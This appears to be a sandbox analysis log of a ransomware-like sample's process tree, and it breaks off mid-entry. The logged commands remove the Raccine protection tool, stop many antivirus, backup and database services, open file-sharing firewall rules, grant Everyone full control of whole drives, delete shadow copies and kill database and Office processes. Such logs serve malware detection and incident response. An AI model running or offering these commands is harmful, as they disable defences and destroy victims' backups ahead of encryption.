- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4604
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:4628
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4692
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4812
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:4856
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4924
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:5040
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4164
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4748
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1964
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:580
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:4156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:4608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:5360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:4744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:5432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:15592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:2120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:5484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:15624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5620
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5644
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:5152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5700
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:5272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:5908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:5216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:5384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:6032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:5920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:4220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:4812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:5840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:6188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:5780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:6180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:4932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:5888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:6596
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:5944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:6768
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:6116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:6480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:6140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:7284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:6172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:9060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:6164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:4784
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:6156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:13024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:6148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:12060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:5240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:12040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:1700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:11888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:4748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:12292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:1964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:11876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:5916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:11908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:5928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:11916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:5992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:11544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:5756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:11940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:4528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:11932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:5788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:11900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:5940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:11948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:1328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:11924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:5104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:12940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:4484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:11884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:5848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:11520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:12964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:12004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:6556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:12928
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:6548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:9052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:6540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:12476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:6532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:5344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:6524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:8308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:6516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:10088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:6508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:5216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:6500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:13032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:5776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:11528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:5628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:12052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:4720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:12468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:4964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:11964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:12948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:5036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:13040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:11988
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:11976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:11992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:8412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:9384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:5516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:8444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:5392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:9068
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:4984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:12956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:4980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:11956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:5372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:11972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:6368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:6432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:13048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:6336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:5268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:6472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:13056
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:4828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:7632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:14892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:9496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:15560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:9488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:16296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:9476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:16200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:9468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:14828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:9460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:15552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:9448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:16144
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:9440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:15672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:9432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:16176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:9424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:15520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:9416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:16120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:9408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:14748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:9396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:14780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:9388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:14796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:9372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:14312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:9364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:15664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:9348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:16184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:9340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:12876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:9328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:12896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:9320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:14772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:9312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:16160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:9304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:14764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:9296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:12356
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:9288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:14804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:9280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:9180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:9268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:14756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:9260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:15688
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:9244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:13584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:9236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:14788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:9224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:14836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10436
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10428
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:10380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:10368
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:10360
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:10352
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:10344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  PID:10336
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  PID:10324
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:10316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  PID:10308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  PID:10300
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:10292
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:10284
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:10272
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:10264
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:10256
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:10248
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:4688
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5620
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:10204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:10172
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:10140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:10116
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:10092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:10072
- C:\Windows\SYSTEM32\taskkill.exe
